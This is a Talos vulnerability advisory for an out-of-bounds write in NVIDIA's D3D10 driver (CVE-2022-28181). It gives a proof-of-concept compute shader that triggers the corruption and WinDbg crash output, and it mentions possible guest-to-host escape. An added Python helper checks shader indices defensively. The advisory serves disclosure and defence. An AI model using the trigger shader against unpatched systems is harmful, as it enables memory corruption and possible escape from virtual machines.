Talos Vulnerability Report

TALOS-2021-1435

NVIDIA nvwgf2umx_cfg.dll shader DCL_INDEXABLE memory corruption vulnerability

May 17, 2022
CVE Number

CVE-2022-28181

Summary

A memory corruption vulnerability exists in the shader dcl_indexable functionality of NVIDIA D3D10 Driver version 496.76, 30.0.14.9676. A specially crafted executable or shader file can lead to memory corruption. This vulnerability could potentially be triggered from guest machines running in virtualization environments (e.g. VMware, QEMU, VirtualBox) in order to perform a guest-to-host escape, as demonstrated previously (TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically, this vulnerability could also be triggered from a web browser (using WebGL and WebAssembly).

Tested Versions

NVIDIA D3D10 Driver 496.76, 30.0.14.9676

Product URLs

D3D10 Driver - https://nvidia.com

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-787 - Out-of-bounds Write

Details

NVIDIA graphics drivers are the software for NVIDIA GPUs installed in a PC. They mediate communication between the operating system and the GPU device, and in most cases are required for the hardware to function properly.

We were able to trigger this vulnerability from a Hyper-V guest using the RemoteFX feature, leading to execution of the vulnerable code on the Hyper-V host (inside the rdvgm.exe process). While RemoteFX was recently deprecated by Microsoft, some older machines may still use it (for example, those running an older version of Windows Server).

This vulnerability can be triggered by supplying a malformed compute shader, which leads to a memory corruption problem in the NVIDIA driver.

When the x temporary register is accessed with an index outside its declared size (normally set by the dcl_indexable_temp instruction, which declares an indexable temporary register), an arbitrary memory write can occur.

Sample shader:

cs_5_0
dcl_global_flags refactoringAllowed
dcl_input vThreadGroupID.xy
dcl_input vThreadID.xy
dcl_temps 4
dcl_indexable_temp x0[32], 4
mov x0[v0.w].x, l(1.1)
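
As an added example (not part of the Talos advisory or NVIDIA's code), the following Python triage helper parses shader assembly of the form shown above: it reads the dcl_indexable_temp declaration, checks constant x# indices against the declared element and component counts, flags register-relative indices such as v0.w that can only be validated at run time, and models the run-time bounds check a driver must apply before such a write. The sample input is the advisory's shader plus two constructed constant-index mov lines for contrast.

```python
import re
# Constructed sample: the advisory's shader plus two constant-index movs for contrast.
SAMPLE_SHADER = """\
cs_5_0
dcl_global_flags refactoringAllowed
dcl_input vThreadGroupID.xy
dcl_input vThreadID.xy
dcl_temps 4
dcl_indexable_temp x0[32], 4
mov x0[v0.w].x, l(1.1)
mov x0[31].w, l(2.0)
mov x0[32].x, l(3.0)
"""
DECL_RE = re.compile(r"^dcl_indexable_temp\s+(x\d+)\[(\d+)\],\s*(\d+)")
DEST_RE = re.compile(r"^mov\s+(x\d+)\[([^\]]+)\]\.([xyzw])")

def parse_indexable_temps(asm):
    """Map each x# register to its (element_count, components) from dcl_indexable_temp."""
    decls = {}
    for line in asm.splitlines():
        m = DECL_RE.match(line.strip())
        if m:
            decls[m.group(1)] = (int(m.group(2)), int(m.group(3)))
    return decls

def classify_writes(asm):
    """Verdict per 'mov x#[idx].c': in_bounds, out_of_bounds, undeclared or dynamic (v0.w-style)."""
    decls = parse_indexable_temps(asm)
    results = []
    for n, line in enumerate(asm.splitlines(), 1):
        m = DEST_RE.match(line.strip())
        if not m:
            continue
        reg, idx, comp = m.groups()
        if reg not in decls:
            verdict = "undeclared"
        elif idx.isdigit():
            count, comps = decls[reg]
            verdict = "in_bounds" if int(idx) < count and "xyzw".index(comp) < comps else "out_of_bounds"
        else:
            verdict = "dynamic"  # index comes from a register; only a run-time check can validate it
        results.append((n, reg, idx, verdict))
    return results

def checked_write(temps, decls, reg, idx, comp, value):
    """Run-time check the driver must apply to a dynamically indexed x# write."""
    count, comps = decls[reg]
    if idx >= count or comp >= comps:
        return False  # drop the write rather than touch memory past the x# storage
    temps[reg][idx * comps + comp] = value
    return True
```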

Debugger output:

00007ffb`12f6cb2b 48890417        mov     qword ptr [rdi+rdx],rax ds:baadf00d`0000000a=????????????????
0:012> r
rax=0000000000000000 rbx=0000000000000000 rcx=000001e3baa206c8
rdx=baadf00d0000000a rsi=000001e3baa206a8 rdi=0000000000000000
rip=00007ffb12f6cb2b rsp=0000001e96feeb20 rbp=0000000000000000
 r8=000000000000000a  r9=000000000000000a r10=00000000811c9dc5
r11=0000000000000001 r12=0000000000000003 r13=0000000000000004
r14=000001e3baa1a7b0 r15=0000001e96feec68

Crash Information

0:012> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for POC_EXEC11.exe

KEY_VALUES_STRING: 1

	Key  : AV.Fault
	Value: Read

	Key  : Analysis.CPU.Sec
	Value: 0

	Key  : Analysis.DebugAnalysisProvider.CPP
	Value: Create: 8007007e on IAMLEGION

	Key  : Analysis.DebugData
	Value: CreateObject

	Key  : Analysis.DebugModel
	Value: CreateObject

	Key  : Analysis.Elapsed.Sec
	Value: 51

	Key  : Analysis.Memory.CommitPeak.Mb
	Value: 77

	Key  : Analysis.System
	Value: CreateObject

	Key  : Timeline.OS.Boot.DeltaSec
	Value: 78046

	Key  : Timeline.Process.Start.DeltaSec
	Value: 44


NTGLOBALFLAG:  470

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffb12f6cb2b (nvwgf2umx!NVDEV_Thunk+0x0000000000358eeb)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: ffffffffffffffff
Attempt to read from address ffffffffffffffff

FAULTING_THREAD:  00002fb8

PROCESS_NAME:  POC_EXEC11.exe

READ_ADDRESS:  ffffffffffffffff 

ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwołała się do pamięci pod adresem 0x%p. Pamięć nie może być %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000000

EXCEPTION_PARAMETER2:  ffffffffffffffff

STACK_TEXT:  
0000001e`96feeb20 00007ffb`12f9daf7 : 00000000`00000000 00000000`00000004 00000000`00000000 00000000`00000002 : nvwgf2umx!NVDEV_Thunk+0x358eeb
0000001e`96feec00 00007ffb`12f9f6e1 : 00000000`00000000 00000000`0000000c 00000000`000000a6 00000001`00000021 : nvwgf2umx!NVDEV_Thunk+0x389eb7
0000001e`96feece0 00007ffb`12f6ed18 : 00000000`00000011 00000000`00000001 0000001e`96feef10 000001e3`ba8f6750 : nvwgf2umx!NVDEV_Thunk+0x38baa1
0000001e`96feed90 00007ffb`12f6e6fa : 000001e3`40000011 00000000`40000011 00000000`00000011 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x35b0d8
0000001e`96feee10 00007ffb`12f32392 : 000001e3`baa0dc68 000001e3`b1546dd0 000001e3`baa02f28 000001e3`b1546dd0 : nvwgf2umx!NVDEV_Thunk+0x35aaba
0000001e`96feef50 00007ffb`12f5136c : 00000000`00000000 000001e3`b1a5e058 000001e3`baa02b90 00000000`00000001 : nvwgf2umx!NVDEV_Thunk+0x31e752
0000001e`96feefb0 00007ffb`12f2e90a : 00000000`00000000 00000000`00000000 000001e3`b1a5e058 00007ffb`12cb54bd : nvwgf2umx!NVDEV_Thunk+0x33d72c
0000001e`96fef2a0 00007ffb`12991f1a : 000001e3`b1a5e058 000001e3`b1a5e040 000001e3`b1a5e040 00000000`00000019 : nvwgf2umx!NVDEV_Thunk+0x31acca
0000001e`96fef2e0 00007ffb`12dc593a : 00000000`00000000 000001e3`b1a5ed40 000001e3`b1a5ed40 0000001e`96fef398 : nvwgf2umx+0x61f1a
0000001e`96fef320 00007ffb`12b861a9 : 0000001e`96fef461 00000000`00000000 000001e3`b5f34a80 0000001e`96fef960 : nvwgf2umx!NVDEV_Thunk+0x1b1cfa
0000001e`96fef3d0 00007ffb`12b58549 : 00000000`00000000 000001e3`b1a5dba0 00000000`00000000 0000001e`96fef960 : nvwgf2umx!NVENCODEAPI_Thunk+0x11cf89
0000001e`96fef470 00007ffb`129ec62a : 000001e3`b1b926f0 000001e3`b1b926f0 0000001e`96fef5c0 0000001e`96fef960 : nvwgf2umx!NVENCODEAPI_Thunk+0xef329
0000001e`96fef4c0 00007ffb`12d808e5 : 00000000`00000000 000001e3`b1b75980 00000000`00000000 00000000`00000000 : nvwgf2umx+0xbc62a
0000001e`96fef930 00007ffb`12d80698 : 00000000`00000000 000001e3`b5f59300 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x16cca5
0000001e`96fefa40 00007ffb`12e9f87c : 000001e3`b1a78440 00000000`00000000 000001e3`b1a78440 00000000`fffffff1 : nvwgf2umx!NVDEV_Thunk+0x16ca58
0000001e`96fefaf0 00007ffb`13c18d58 : 00000000`00000000 00000000`00000000 000001e3`b1b70e20 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x28bc3c
0000001e`96fefb40 00007ffb`64e67034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5b2f48
0000001e`96fefb70 00007ffb`65b02651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0000001e`96fefba0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


SYMBOL_NAME:  nvwgf2umx!NVDEV_Thunk+358eeb

MODULE_NAME: nvwgf2umx

IMAGE_NAME:  nvwgf2umx.dll

STACK_COMMAND:  ~12s ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_nvwgf2umx.dll!NVDEV_Thunk

BUCKET_ID_MODPRIVATE: 1

OS_VERSION:  10.0.19041.1

BUILDLAB_STR:  vb_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

FAILURE_ID_HASH:  {dd25751c-f187-50b1-f643-86818a26af0d}

Followup:     MachineOwner
---------

Timeline

2022-01-13 - Vendor Disclosure
2022-05-16 - Vendor Patch Release
2022-05-17 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.